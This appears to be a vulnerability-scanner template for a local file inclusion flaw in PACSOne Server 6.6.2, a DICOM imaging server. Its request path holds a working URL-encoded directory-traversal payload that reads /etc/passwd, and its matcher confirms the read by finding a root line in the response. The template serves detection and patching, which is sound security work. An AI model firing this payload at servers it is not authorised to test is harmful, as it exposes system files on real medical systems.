id: pacsone-server-lfi

info:
  name: PACSOne Server 6.6.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: PACSOne Server 6.6.2 is vulnerable to local file inclusion via its integrated DICOM Web Viewer.
  reference:
    - https://cxsecurity.com/issue/WLB-2018010303
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: pacsone,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 490a0046304402200164c68e3286450452d0da7778d427e1c86f4f58227b60d44c7e6eaff3b48273022022d1126fb36bf697081b4685b760fb517ed8dbf12d8820878385c5ba73891eba:922c64590222798bb761d5b6d8e72950
